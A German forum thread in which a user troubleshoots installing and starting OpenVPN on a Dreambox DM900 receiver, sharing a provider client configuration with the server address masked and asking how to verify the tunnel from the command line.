OpenVPN mit DM900

    Diese Seite verwendet Cookies. Durch die Nutzung unserer Seite erklären Sie sich damit einverstanden, dass wir Cookies setzen. Weitere Informationen

    • OpenVPN mit DM900

      Hallo zusammen,

      ich versuche openvpn auf der dm900 zu installieren.(Image: Newnigma2 OE 2.5)
      Habe das vpn package via telnet installiert auch package update gemacht.
      Das config file von meinem vpn provider in /etc/openvpn verschoben. Rechte auch 755 und umbenannt in .conf.

      Ich bekomme keinen VPN Dienst unter newnigma2-> System Werkzeuge angezeigt.
      Auch auch das Starten der .conf Datei via telnet endet mit einem: Error opening configuration file.

      Kann mir da jemand helfen?
    • Danke, habe es jetzt. Leider startet der VPN nicht n/a.
      Kenne mich nicht so gut aus. Fehlt da irgendwo noch der Benutzer?

      Das .conf File:


      dev tun
      fast-io
      persist-key
      persist-tun
      nobind
      remote ****.**** 1195

      remote-random
      pull
      comp-lzo
      tls-client
      verify-x509-name Server name-prefix
      ns-cert-type server
      key-direction 1
      route-method exe
      route-delay 2
      tun-mtu 1500
      fragment 1300
      mssfix 1450
      verb 3
      cipher AES-256-CBC
      keysize 256
      auth SHA512
      sndbuf 524288
      rcvbuf 524288
      auth-user-pass

      Dann kommt noch das Certificat, RSA Privat Key, Open VPN Static Key und nochmals ein Certificat. Alles im gleichen File.

      Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von various ()

    • Gemacht, VPN läuft.

      Gibt es eine Möglichkeit die Verbindung zum VPN Server via command line zu überprüfen?

      Wenn ich den VPN Server per Hostname pinge bekomme ich die IP.
      Beim traceroute auf zb. google.com sehe ich die IP vom VPN Server jedoch nicht in der Liste.